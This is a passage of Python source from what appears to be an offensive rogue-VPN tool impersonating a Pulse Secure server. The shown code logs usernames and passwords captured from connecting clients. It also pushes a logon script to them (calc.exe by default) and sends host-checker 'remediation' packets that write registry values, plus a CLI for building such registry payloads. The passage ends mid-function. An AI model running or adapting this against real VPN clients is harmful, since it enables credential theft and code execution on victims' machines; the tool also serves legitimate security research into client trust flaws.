boundary padding = (4 - (serialized.tell() % 4)) % 4 if padding > 0: serialized.write(b"\x00" * padding) elif cmd_num == 0x0ce4: # Encapsulation # Handle nested commands nested_commands = cmd_data.get('commands', cmd_data) nested_data = FunkManager._serialize_commands(nested_commands) length = len(nested_data) + 12 # Write single header for all nested commands header = struct.pack(">IBBHI", cmd_num, # 4 bytes command flag1, # 1 byte flag1 flag2, # 1 byte flag2 length, # 2 bytes length VENDOR_JUNIPER2 # 4 bytes vendor ) serialized.write(header) serialized.write(nested_data) # Add padding to nearest word boundary padding = (4 - (serialized.tell() % 4)) % 4 if padding > 0: serialized.write(b"\x00" * padding) elif cmd_num == 0x0cf0: # Another type of encapsulation # Handle nested commands nested_commands = cmd_data.get('commands', cmd_data) nested_data = FunkManager._serialize_commands(nested_commands) length = len(nested_data) + 12 # Write header header = struct.pack(">IBBHI", cmd_num, # 4 bytes command flag1, # 1 byte flag1 flag2, # 1 byte flag2 length, # 2 bytes length VENDOR_JUNIPER2 # 4 bytes vendor ) serialized.write(header) serialized.write(nested_data) # Add padding to nearest word boundary padding = (4 - (serialized.tell() % 4)) % 4 if padding > 0: serialized.write(b"\x00" * padding) elif cmd_num == 0x0cf1: # String without hex prefixer string_bytes = cmd_data['string'].encode('utf-8') length = len(string_bytes) + 12 # Write header header = struct.pack(">IBBHI", cmd_num, # 4 bytes command flag1, # 1 byte flag1 flag2, # 1 byte flag2 length, # 2 bytes length VENDOR_JUNIPER2 # 4 bytes vendor ) serialized.write(header) serialized.write(string_bytes) # Add padding to nearest word boundary padding = (4 - (serialized.tell() % 4)) % 4 if padding > 0: serialized.write(b"\x00" * padding) return serialized.getvalue() if __name__ == "__main__": parser = argparse.ArgumentParser(description='Parse and generate Funk binary data.') parser.add_argument('-i', '--input', 
help='Input binary file to parse') parser.add_argument('-o', '--output', help='Output file for generated data') parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose logging') parser.add_argument('--output-json', action='store_true', help='Output JSON instead of binary') # Command options can be supplied as a JSON file or as command line arguments parser.add_argument('-j', '--json', help='JSON file containing the command dictionary') # Command line arguments for manual generation parser.add_argument('--time', action='store_true', help='Use current time for server_time') parser.add_argument('--subkey', help='Subkey for registry command', default='SOFTWARE\\Classes\\abc') parser.add_argument('--rulename', help='Rule name for registry command', default='woot') parser.add_argument('--regname', help='Registry name for registry command', default='woot') parser.add_argument('--policy', help='Policy for policydata command', default='vc0|43|policy_2|1|woot') parser.add_argument('--hive', help='Registry hive', default='HKEY_LOCAL_MACHINE') parser.add_argument('--value', help='Registry value (will be base64 encoded)', default='pwnd') args = parser.parse_args() log_level = logging.DEBUG if args.verbose else logging.INFO logging.basicConfig(level=log_level) # Get commands either from JSON or generate from arguments if args.json: try: with open(args.json, 'r') as f: commands = json.load(f) except Exception as e: logging.error(f"Error loading JSON file: {e}") exit(1) else: # Generate commands from command line arguments commands = FunkManager.registry_command( args.rulename, args.subkey, args.regname, args.policy, args.hive, args.value ) # Parse input file if provided if args.input: try: with open(args.input, "rb") as f: input_data = f.read() parsed_data = FunkManager.parse(input_data) logging.info(f"Parsed input data: {parsed_data}") except Exception as e: logging.error(f"Error parsing input file: {e}") # Generate output if args.output: try: if 
args.output_json: # Output the command dictionary as JSON with open(args.output, 'w') as f: json.dump(commands, f, indent=4) else: # Generate binary output generated_data = FunkManager.generate(commands) with open(args.output, "wb") as f: f.write(generated_data) logging.info(f"Generated data written to '{args.output}'") except Exception as e: logging.error(f"Error generating output file: {e}") exit(1) ================================================ FILE: src/nachovpn/plugins/pulse/plugin.py ================================================ from nachovpn.plugins import VPNPlugin from nachovpn.plugins.pulse.config_generator import VPNConfigGenerator, ESPConfigGenerator from nachovpn.plugins.pulse.funk_parser import FunkManager import random import string import os import io import socket import ssl import json """ Note: these values are from openconnect/pulse.c See: https://github.com/openconnect/openconnect/blob/master/pulse.c References: - https://www.infradead.org/openconnect/pulse.html - https://www.infradead.org/openconnect/juniper.html - https://trustedcomputinggroup.org/wp-content/uploads/TNC_IFT_TLS_v2_0_r8.pdf """ IFT_VERSION_REQUEST = 1 IFT_VERSION_RESPONSE = 2 IFT_CLIENT_AUTH_REQUEST = 3 IFT_CLIENT_AUTH_SELECTION = 4 IFT_CLIENT_AUTH_CHALLENGE = 5 IFT_CLIENT_AUTH_RESPONSE = 6 IFT_CLIENT_AUTH_SUCCESS = 7 EAP_REQUEST = 1 EAP_RESPONSE = 2 EAP_SUCCESS = 3 EAP_FAILURE = 4 IFT_TLS_CLIENT_INFO = 0x88 VENDOR_JUNIPER = 0xa4c VENDOR_JUNIPER2 = 0x583 VENDOR_TCG = 0x5597 JUNIPER_1 = 0xa4c01 EAP_TYPE_EXPANDED= 0xfe AVP_CODE_EAP_MESSAGE = 0x4f # 0xfe000a4c EXPANDED_JUNIPER = ((EAP_TYPE_EXPANDED << 24) | VENDOR_JUNIPER) AVP_VENDOR = 0x80 AVP_OS_INFO = 0xD5E AVP_USER_AGENT = 0xD70 AVP_LANGUAGE = 0xD5F AVP_REALM = 0xD50 # Request codes for the Juniper Expanded/2 auth requests. 
J2_PASSCHANGE = 0x43 J2_PASSREQ = 0x01 J2_PASSRETRY = 0x81 J2_PASSFAIL = 0xc5 LICENSE_ID = ''.join(random.choices(string.ascii_uppercase + string.digits, k=17)) class IFTPacket: def __init__(self, vendor_id=None, message_type=None, message_identifier=None, message_value=None): self.vendor_id = vendor_id self.message_type = message_type self.message_identifier = message_identifier self.message_value = message_value if message_value else bytearray() self.message_length = len(self.message_value) + 16 def __str__(self): return f'IF-T Packet: Vendor={hex(self.vendor_id)}, Message Type={self.message_type}, ' \ f'Message Length={self.message_length}, Message Identifier={hex(self.message_identifier)}, ' \ f'Message Value={self.message_value.hex()}' def to_bytes(self): # Recalculate length self.message_length = len(self.message_value) + 16 return self.vendor_id.to_bytes(4, 'big') + \ self.message_type.to_bytes(4, 'big') + \ self.message_length.to_bytes(4, 'big') + \ self.message_identifier.to_bytes(4, 'big') + \ self.message_value @classmethod def from_bytes(cls, data): if len(data) < 16: raise ValueError("Data too short to parse IF-T packet") reader = io.BytesIO(data) return cls.from_io(reader) @classmethod def from_io(cls, reader): if reader.getbuffer().nbytes < 16: raise ValueError("Data too short to parse IF-T packet") vendor_id = int.from_bytes(reader.read(4), 'big') message_type = int.from_bytes(reader.read(4), 'big') message_length = int.from_bytes(reader.read(4), 'big') message_identifier = int.from_bytes(reader.read(4), 'big') message_value = reader.read(message_length - 16) return cls(vendor_id, message_type, message_identifier, message_value) class EAPPacket: def __init__(self, vendor=None, code=None, identifier=None, eap_data=bytearray()): self.vendor = vendor self.code = code self.identifier = identifier self.eap_data = eap_data self.length = 4 + len(eap_data) def __str__(self): return f'EAP Packet: Vendor={hex(self.vendor)}, Code={self.code}, 
Identifier={hex(self.identifier)}, ' \ f'Length={self.length}, Data={self.eap_data.hex()}' def to_bytes(self): # Recalculate length self.length = 4 + len(self.eap_data) return self.vendor.to_bytes(4, 'big') \ + bytes([self.code, self.identifier]) \ + self.length.to_bytes(2, 'big') \ + self.eap_data @classmethod def from_bytes(cls, data): vendor = int.from_bytes(data[:4], 'big') code = data[4] identifier = data[5] length = int.from_bytes(data[6:8], 'big') eap_data = data[8:8 + length - 4] if length >= 4 else bytearray() return cls(vendor, code, identifier, eap_data) class AVP: def __init__(self, code, flags=0, vendor=None, value=bytearray()): self.code = code self.flags = flags self.vendor = vendor self.value = value # Calculate the initial length (8 bytes for the header, optionally 4 bytes for the vendor, plus the value length) self.length = 8 + (4 if vendor is not None else 0) + len(value) def padding_required(self): if self.length & 3: return 4 - (self.length & 3) return 0 @classmethod def from_bytes(cls, data): if len(data) < 8: raise ValueError("Packet too short to parse AVP") code = int.from_bytes(data[:4], 'big') length = int.from_bytes(data[4:8], 'big') & 0xffffff flags = data[4] vendor = None value_start = 8 if flags & AVP_VENDOR: if len(data) < 12: raise ValueError("Packet too short to parse AVP with vendor") vendor = int.from_bytes(data[8:12], 'big') value_start = 12 value = data[value_start:value_start + length - (12 if vendor else 8)] return cls(code, flags, vendor, value) def to_bytes(self, include_padding=False): # Re-calculate length to ensure it's current self.length = 8 + (4 if self.vendor is not None else 0) + len(self.value) avp_bytes = self.code.to_bytes(4, 'big') # Flags are stored in the most significant byte of the length field avp_bytes += (self.length | (self.flags << 24)).to_bytes(4, 'big') if self.vendor is not None: avp_bytes += self.vendor.to_bytes(4, 'big') avp_bytes += self.value if include_padding: avp_bytes += b'\x00' * 
self.padding_required() return avp_bytes def __str__(self): # Re-calculate length for display purposes self.length = 8 + (4 if self.vendor is not None else 0) + len(self.value) return f"AVP: Code={self.code}, Length={self.length}, " \ f"Flags={self.flags}, Vendor={self.vendor}, " \ f"Value={self.value.hex()}" class PulseSecurePlugin(VPNPlugin): REQUIRED_RULE_KEYS = {"rulename", "subkey", "regname", "hive", "value", "type"} ALLOWED_TYPES = {"String", "DWORD"} @staticmethod def validate_rules(rules): if not isinstance(rules, list): return False, "Rules file must be a JSON array of rule objects." for idx, rule in enumerate(rules): if not isinstance(rule, dict): return False, f"Rule at index {idx} is not a JSON object." missing = PulseSecurePlugin.REQUIRED_RULE_KEYS - rule.keys() if missing: return False, f"Rule at index {idx} is missing required keys: {', '.join(missing)}" for key in PulseSecurePlugin.REQUIRED_RULE_KEYS: if key != "value": if not isinstance(rule[key], str) or not rule[key].strip(): return False, f"Rule at index {idx} has invalid or empty value for key: {key}" if key == "type" and rule[key] not in PulseSecurePlugin.ALLOWED_TYPES: return False, f"Rule at index {idx} has invalid type: {rule[key]}" # Type-specific value checks if rule["type"] == "DWORD": try: int(rule["value"]) except Exception as e: return False, f"Rule at index {idx} has value for type {rule['type']} that cannot be parsed as integer: {rule['value']!r}: {e}" else: if not isinstance(rule["value"], str) or not rule["value"].strip(): return False, f"Rule at index {idx} has invalid or empty string value for type {rule['type']}" return True, None def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.logon_script = os.getenv("PULSE_LOGON_SCRIPT", "C:\\Windows\\System32\\calc.exe") self.logon_script_macos = os.getenv("PULSE_LOGON_SCRIPT_MACOS", "") self.dns_suffix = os.getenv("PULSE_DNS_SUFFIX", "nachovpn.local") self.anonymous_auth = os.getenv("PULSE_ANONYMOUS_AUTH", 
"false").lower() == 'true' self.pulse_username = os.getenv("PULSE_USERNAME", "") self.pulse_save_connection = os.getenv("PULSE_SAVE_CONNECTION", "false").lower() == 'true' self.vpn_name = os.getenv("VPN_NAME", "NachoVPN") self._eap_identifier = 1 # Host checker policy self.host_checker_policy_id = f"vc0|43|policy_2|1|woot" # Load rules from JSON file self.host_checker_rules_file = os.getenv("PULSE_HOST_CHECKER_RULES_FILE") self.host_checker_rules = None if not self.host_checker_rules_file: self.logger.error("PULSE_HOST_CHECKER_RULES_FILE environment variable must be set to a JSON rules file.") else: try: with open(self.host_checker_rules_file, 'r', encoding='utf-8') as f: rules = json.load(f) valid, error = self.validate_rules(rules) if not valid: self.logger.error(f"Host checker rules validation failed: {error}") else: self.host_checker_rules = rules self.logger.info(f"Loaded host checker rules from {self.host_checker_rules_file}") except Exception as e: self.logger.error(f"Failed to load host checker rules from {self.host_checker_rules_file}: {e}") self.buffer_size = 4096 self.max_packet_size = 65535 def close(self): self.ssl_server_socket.close() def can_handle_data(self, data, client_socket, client_ip): if len(data) >= 4 and int.from_bytes(data[:4], 'big') == VENDOR_TCG: return True return False def can_handle_http(self, handler): user_agent = handler.headers.get('User-Agent', '') if 'odJPAService' in user_agent or \ 'Secure%20Access' in user_agent or \ handler.path == '/pulse': return True return False def handle_http(self, handler): if handler.command == 'GET': self.handle_get(handler) return True def has_credentials(self, data): # TODO: actually check properly if len(data) < 20 or self.expanded_juniper_subtype(data) != 1: return False # lazy: check for host checker signature if b'\xFE\x00\x0A\x4C\x00\x00\x00\x03' in data: return False user_avp = AVP.from_bytes(data[8:]) if user_avp.code == 0xD6D: return True return False def extract_credentials(self, data): 
# seems to be: EXPANDED_JUNIPER + subtype=0x01 + AVP(0xd6d) if len(data) < 20 or self.expanded_juniper_subtype(data) != 1: return False data = data[8:] user_avp = AVP.from_bytes(data) if user_avp.code != 0xD6D: return False username = user_avp.value.decode() self.logger.info(f'Extracted username: {username}') # remove any padding padding_size = user_avp.padding_required() data = data[user_avp.length+padding_size:] # the next bytes *should* be 0x4f in big endian if int.from_bytes(data[0:4], 'big') != 79: self.logger.error('AVP_CODE_EAP_MESSAGE not found') return False if len(data) < 0x16: self.logger.error('Data too short to extract password') return False # there are some other fields/headers here we should maybe check # but for now we'll just extract the password length = int(data[0x16]) - 2 if len(data) < 0x17 + length: self.logger.error('Data too short to extract password') return False password = data[0x17:0x17+length].decode() self.logger.info(f'Extracted password: {password}') self.log_credentials(username, password) return True def handle_get(self, handler): if handler.path == '/': self.logger.info('Switching protocols ..') handler.send_response(101) handler.send_header('Content-Type', 'application/octet-stream') handler.send_header('Pragma', 'no-cache') handler.send_header('Upgrade', 'IF-T/TLS 1.0') handler.send_header('Connection', 'Upgrade') handler.send_header('HC_HMAC_VERSION_COOKIE', '1') handler.send_header('supportSHA2Signature', '1') handler.send_header('Connection', 'Keep-Alive') handler.send_header('Keep-Alive', 'timeout=15') handler.send_header('Strict-Transport-Security', 'max-age=31536000') handler.send_header('accept-ch', 'Sec-CH-UA-Platform-Version') handler.end_headers() # transition to IF-T/TLS self.logger.info('Transitioning to IF-T/TLS ..') self.handle_data(None, handler.connection, handler.client_address[0]) elif handler.path == '/pulse': self.logger.info('Sending URI handler response ..') html = "" handler.send_response(200) 
handler.send_header('Content-Type', 'text/html') handler.end_headers() handler.wfile.write(html.encode()) def next_eap_identifier(self): self._eap_identifier += 1 if self._eap_identifier >= 5: self._eap_identifier = 1 return self._eap_identifier def is_policy_request(self, data): result = self.is_policy_type(data) and b'parameter name="policy_request"' in data self.logger.debug(f'is_policy_request: {result}') return result def is_policy_type(self, data): # seems to be: EXPANDED_JUNIPER + 0x01 + AVP(0xd6d) if len(data) < 20 or self.expanded_juniper_subtype(data) != 1: return False data = data[8:] user_avp = AVP.from_bytes(data) if user_avp.code != 0xD6D: return False username = user_avp.value.decode() self.logger.info(f'Extracted username: {username}') # remove any padding padding_size = user_avp.padding_required() data = data[user_avp.length+padding_size:] # the next bytes *should* be 0x4f in big endian if int.from_bytes(data[0:4], 'big') != 79: self.logger.error('AVP_CODE_EAP_MESSAGE not found') return False return True def expanded_juniper_subtype(self, data): if len(data) < 8 or \ int.from_bytes(data[0:4], 'big') != EXPANDED_JUNIPER: return None return int.from_bytes(data[4:8], 'big') def is_funk_message(self, data): if len(data) < 16 or self.expanded_juniper_subtype(data) != 1: return False # lazy: just check for the 0xD6D AVP and the funk message signature # TODO: create an EXPANDED_JUNIPER class for easier (de)serialization user_avp = AVP.from_bytes(data[8:]) if user_avp.code == 0xD6D and b'\x00\x00\x00\x16\xC0\x00\x00' in data: return True return False def is_client_info(self, data): self.logger.debug(f'is_client_info input: {data.hex()}') if len(data) < 24 or self.expanded_juniper_subtype(data) != 1: return False data = data[8:] # check if the first AVP is 0xD49 avp = AVP.from_bytes(data) if avp.code != 0xD49: return False self.logger.info(f"AVP: Code={avp.code:04X}, Value={avp.value.hex()}") # check if the second AVP is 0xD61 data = 
            data[avp.length+avp.padding_required():]
        avp = AVP.from_bytes(data)
        if avp.code != 0xD61:
            return False
        self.logger.info(f"AVP: Code={avp.code:04X}, Value={avp.value.hex()}")
        # read the rest of the AVPs
        # TODO: log the client provided AVP data
        # this contains OS info, user-agent, etc.
        data = data[avp.length+avp.padding_required():]
        while len(data) > 0:
            avp = AVP.from_bytes(data)
            self.logger.info(f"AVP: Code={avp.code:04X}, Value={avp.value.hex()}")
            data = data[avp.length+avp.padding_required():]
        return True

    def auth_completed(self, data):
        """Return True once the client acknowledges auth completion (AVP 0xD6B with value 0x10)."""
        if len(data) < 24 or self.expanded_juniper_subtype(data) != 1:
            return False
        avp = AVP.from_bytes(data[8:])
        return avp.code == 0xD6B and \
            int.from_bytes(avp.value, 'big') == 0x10

    def parse_eap_packet(self, data, client_socket, connection_id):
        """Drive the EAP state machine for one IF-T/TLS auth-response frame.

        *data* is the message_value of an IFT_CLIENT_AUTH_RESPONSE packet.
        Returns a bytearray of IF-T/TLS reply frames to send back; some
        branches (e.g. auth completion) also write directly to
        *client_socket*. *connection_id* identifies the packet-handler
        session for IP assignment.
        """
        outbuf = bytearray()
        if int.from_bytes(data[0:4], 'big') != JUNIPER_1:
            self.logger.warning('Received invalid EAP packet')
            return outbuf
        eap_in = EAPPacket.from_bytes(data)
        self.logger.debug(eap_in)

        # EAP Packet: Vendor=0xa4c01, Code=2, Identifier=0x1, Length=14, Data=01616e6f6e796d6f7573
        if eap_in.code == EAP_RESPONSE and eap_in.identifier == 1 and not self.anonymous_auth and eap_in.eap_data[1:] == b'anonymous':
            self.logger.info('Received anonymous auth, sending server info ..')
            # Add the AVP data
            avp_list = []
            avp_list.append(AVP(code=0xD49, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=(4).to_bytes(4, 'big')))
            avp_list.append(AVP(code=0xD4A, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=(1).to_bytes(4, 'big')))
            avp_list.append(AVP(code=0xD56, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=LICENSE_ID.encode()))
            # Create the EAP data from AVP
            eap_data = bytearray()
            eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
            eap_data += (1).to_bytes(4, 'big')
            for avp in avp_list:
                eap_data += avp.to_bytes(include_padding=True)
            # Construct EAP packet
            eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=self.next_eap_identifier(), eap_data=eap_data)
            # Build IFT packet
            reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x5, message_identifier=0x01F7, message_value=eap.to_bytes())
            # Append to output buffer
            outbuf += reply.to_bytes()

        # EAP Packet: Vendor=0xa4c01, Code=2, Identifier=0x2, Length=296, Data=fe000a4c0000000100000d4980000010000005830000000400000d61 ..
        elif eap_in.code == EAP_RESPONSE and not self.anonymous_auth and not self.host_checker_rules and self.is_client_info(eap_in.eap_data):
            self.logger.info('Received AVP structures with OS data. Asking for creds..')
            outer_eap_data = bytearray()
            outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
            outer_eap_data += (1).to_bytes(4, 'big')
            # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS)
            inner_eap_data = bytearray()
            inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
            inner_eap_data += (2).to_bytes(4, 'big')   # subtype: J2
            inner_eap_data += J2_PASSREQ.to_bytes(1, 'big')   # J2 password request
            inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x00, eap_data=inner_eap_data)
            # Build the AVP data from inner EAP data (without vendor)
            avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:])
            # Add AVP data to outer EAP data
            outer_eap_data += avp.to_bytes(include_padding=True)
            # Construct outer EAP packet
            outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=self.next_eap_identifier(), eap_data=outer_eap_data)
            # Build IFT packet
            reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01F8, message_value=outer_eap.to_bytes())
            # Append to output buffer
            outbuf += reply.to_bytes()

        # EAP Packet: Vendor=0xa4c01, Code=2, Identifier=0x3, Length=56, Data=fe000a4c0000000100000d6d8000001000000583616161610000004f4000001a02000012fe000a4c000000020202056161610583
        # NOTE(review): 'and' binds tighter than 'or', so this reads as
        # (EAP_RESPONSE and anonymous) OR has_credentials(...) — meaning
        # has_credentials() alone can satisfy the branch regardless of
        # eap_in.code. Likely intended: EAP_RESPONSE and (anonymous or creds).
        # Confirm before changing — the golden packet traces depend on flow order.
        elif eap_in.code == EAP_RESPONSE and (self.anonymous_auth and eap_in.eap_data[1:] == b'anonymous') or self.has_credentials(eap_in.eap_data):
            self.logger.info('Received credentials, sending back some cookies ..')
            if not self.anonymous_auth and not self.extract_credentials(eap_in.eap_data):
                self.logger.warning("Failed to extract credentials")
                return bytearray()
            # Build the AVP data dynamically using the AVP class
            avp_list = []
            avp_list.append(AVP(code=0xD53, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=os.urandom(16).hex().encode()))   # DSID cookie
            avp_list.append(AVP(code=0xD8B, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=os.urandom(8).hex().encode()))    # ??
            avp_list.append(AVP(code=0xD8D, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=bytearray()))                     # ??
            avp_list.append(AVP(code=0xD5C, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=(3600).to_bytes(4, 'big')))       # auth expiry
            avp_list.append(AVP(code=0xD54, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=b'10.0.1.4'))
            avp_list.append(AVP(code=0xD55, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=self.get_thumbprint()['md5'].encode()))   # cert MD5
            avp_list.append(AVP(code=0xD6B, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=b'\x00\x00\x00\x10'))             # ??
            avp_list.append(AVP(code=0xD75, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=b'\x00\x00\x00\x00'))             # idle timeout
            avp_list.append(AVP(code=0xD57, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=b'\x00\x00\x00\x00'))             # ??
            # Create the EAP data
            eap_data = bytearray()
            # EXPANDED_JUNIPER struct
            eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
            eap_data += (1).to_bytes(4, 'big')   # subtype
            # Add AVPs
            for avp in avp_list:
                eap_data += avp.to_bytes()
            # Construct EAP packet
            eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=self.next_eap_identifier(), eap_data=eap_data)
            # Build IFT packet
            reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=IFT_CLIENT_AUTH_CHALLENGE, message_identifier=0x01FB, message_value=eap.to_bytes())
            # Append to output buffer
            outbuf += reply.to_bytes()

        # EAP Packet: Vendor=0xa4c01, Code=2, Identifier=0x4, Length=28, Data=fe000a4c0000000100000d6b800000100000058300000010
        elif eap_in.code == EAP_RESPONSE and self.auth_completed(eap_in.eap_data):
            self.logger.info('Auth completed, sending configuration and launching application...')
            outbuf = bytearray()
            # Get the assigned IP from the packet handler
            client_ip = self.packet_handler.get_assigned_ip(connection_id)
            if not client_ip:
                self.logger.error("No IP allocated for client")
                return outbuf
            # Auth response (ok) — sent directly rather than via outbuf
            eap = EAPPacket(vendor=JUNIPER_1, code=EAP_SUCCESS, identifier=self.next_eap_identifier(), eap_data=bytearray())
            reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=IFT_CLIENT_AUTH_SUCCESS, message_identifier=0x01FD, message_value=eap.to_bytes())
            client_socket.sendall(reply.to_bytes())
            # config packet, wrapped with IF-T
            generator = VPNConfigGenerator(
                logon_script=self.logon_script,
                logon_script_macos=self.logon_script_macos,
                client_ip=client_ip
            )
            # strip the first 0x10 bytes of the generated config (header)
            config = generator.create_config()[0x10:]
            reply = IFTPacket(vendor_id=VENDOR_JUNIPER, message_type=1, message_identifier=0x01FE, message_value=config)
            client_socket.sendall(reply.to_bytes())
            # now send the ESP config
            esp_config = ESPConfigGenerator().create_config()
            reply = IFTPacket(vendor_id=VENDOR_JUNIPER, message_type=1, message_identifier=0x200, message_value=esp_config)
            client_socket.sendall(reply.to_bytes())
            # End of configuration packet
            reply = IFTPacket(vendor_id=VENDOR_JUNIPER, message_type=0x8F, message_identifier=0x201, message_value=b'\x00\x00\x00\x00')
            client_socket.sendall(reply.to_bytes())
            # Final packet - send the license ID
            reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x96, message_identifier=0x202, message_value=LICENSE_ID.encode())
            client_socket.sendall(reply.to_bytes())

        # This branch handles all EAP response messages for the host checker
        elif eap_in.code == EAP_RESPONSE and self.host_checker_rules and not self.anonymous_auth:
            self.logger.info('Received EAP_RESPONSE for host checker')
            # TODO: we got a policy response, we need to actually parse the result
            if b'policy:vc0' in eap_in.eap_data and b'status:OK' in eap_in.eap_data:
                self.logger.info('Received host checker OK response. Asking for creds..')
                outer_eap_data = bytearray()
                outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
                outer_eap_data += (1).to_bytes(4, 'big')
                # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS)
                inner_eap_data = bytearray()
                inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
                inner_eap_data += (2).to_bytes(4, 'big')   # subtype: J2
                inner_eap_data += J2_PASSREQ.to_bytes(1, 'big')   # J2 password request
                inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x00, eap_data=inner_eap_data)
                # Build the AVP data from inner EAP data (without vendor)
                avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:])
                # Add AVP data to outer EAP data
                outer_eap_data += avp.to_bytes(include_padding=True)
                # Construct outer EAP packet
                outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x05, eap_data=outer_eap_data)
                # Build IFT packet
                reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01FA, message_value=outer_eap.to_bytes())
                # Append to output buffer
                outbuf += reply.to_bytes()

            elif b'policy:vc0' in eap_in.eap_data and b'status:NOTOK' in eap_in.eap_data:
                self.logger.info('Received host checker NOT OK response. Sending remediation packet..')
                # TODO: same here, we need to actually parse the result
                # The client indicated that the policy was not OK, so we need to send a remediation packet
                # EAP within AVP within EAP within EAP within IF-T/TLS
                outer_eap_data = bytearray()
                outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
                outer_eap_data += (1).to_bytes(4, 'big')
                # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS)
                inner_eap_data = bytearray()
                inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
                inner_eap_data += (3).to_bytes(4, 'big')
                inner_eap_data += b'\x01'   # no idea, maybe number of policies?
                # Build a host-checker policy with a registry command
                commands = FunkManager.remediation_command(policy_id=self.host_checker_policy_id)
                policy = FunkManager.generate(commands)
                # Wrap it in an EAP request
                inner_eap_data += policy
                inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x03, eap_data=inner_eap_data)
                # Build the AVP data from inner EAP data (without vendor)
                avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:])
                # Add AVP data to outer EAP data
                outer_eap_data += avp.to_bytes(include_padding=True)
                # Construct outer EAP packet
                outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x05, eap_data=outer_eap_data)
                # Build IFT packet
                reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01FA, message_value=outer_eap.to_bytes())
                # Append to output buffer
                outbuf += reply.to_bytes()

            elif self.is_funk_message(eap_in.eap_data):
                self.logger.info('Received funk message')
                # The client sends an EAP_RESPONSE with a compressed policy message
                # IFT_CLIENT_AUTH_RESPONSE: Id=0x0000
                #   EAP_RESPONSE: Vendor=JUNIPER_1, Code=EAP_RESPONSE, Id=0x05, Length=0x088
                #     EXPANDED_JUNIPER: Subtype=0x01
                #       AVP: 0x0D6D=admin..
                #       Followed by compressed policy message from client
                # => 0000000000  00 00 55 97 00 00 00 06 00 00 00 9c 00 00 00 00  ..U.............
                # => 0000000010  00 0a 4c 01 02 05 00 88 fe 00 0a 4c 00 00 00 01  ..L........L....
                # => 0000000020  00 00 0d 6d 80 00 00 11 00 00 05 83 61 64 6d 69  ...m........admi
                # => 0000000030  6e 00 0d 61 00 00 00 4f 40 00 00 65 02 03 00 5d  n..a...O@..e...]
                # => 0000000040  fe 00 0a 4c 00 00 00 03 01 00 00 00 16 c0 00 00  ...L............
                # => 0000000050  4e 00 00 05 83 00 00 00 40 78 9c 63 60 e0 79 72  N.......@x.c`.yr
                # => 0000000060  80 81 81 87 81 81 b5 19 48 3d 05 b2 95 40 6c c7  ........H=...@l.
                # => 0000000070  e4 e4 d4 82 12 5d 9f c4 bc f4 d2 c4 f4 54 2b 85  .....].......T+.
                # => 0000000080  d4 3c dd d0 60 06 20 e0 f9 dc c0 c0 20 00 51 cf  .<..`. ..... .Q.
                # => 0000000090  c0 08 00 ed ae 0e 5b 00 00 4f 4b 0a              ......[..OK.
                #
                # Decompressed message:
                # 0x0ce5: Accept-Language: en-US
                # 0x0cf3: 1
                # 00000000  00 00 0c e4 c0 00 00 0c 00 00 05 83 00 00 0c e5  |...äÀ..........å|
                # 00000010  c0 00 00 22 00 00 05 83 41 63 63 65 70 74 2d 4c  |À.."....Accept-L|
                # 00000020  61 6e 67 75 61 67 65 3a 20 65 6e 2d 55 53 00 00  |Language: en-US..|
                # 00000030  00 00 0c f3 80 00 00 10 00 00 05 83 00 00 00 01  |...ó............|
                #
                # TODO:
                # we should parse the client message, but for now we can just reply with
                # some AVP codes which indicate an error has occurred
                # at this point we might be able to complete auth instead of sending an error (to avoid disconnect)
                avp_list = []
                avp_list.append(AVP(code=0xD57, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=b'\x00\x00\x00\x00'))
                avp_list.append(AVP(code=0xD60, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=b'\x00\x00\x00\x00'))
                # Create the EAP data
                eap_data = bytearray()
                # EXPANDED_JUNIPER struct
                eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
                eap_data += (1).to_bytes(4, 'big')   # subtype
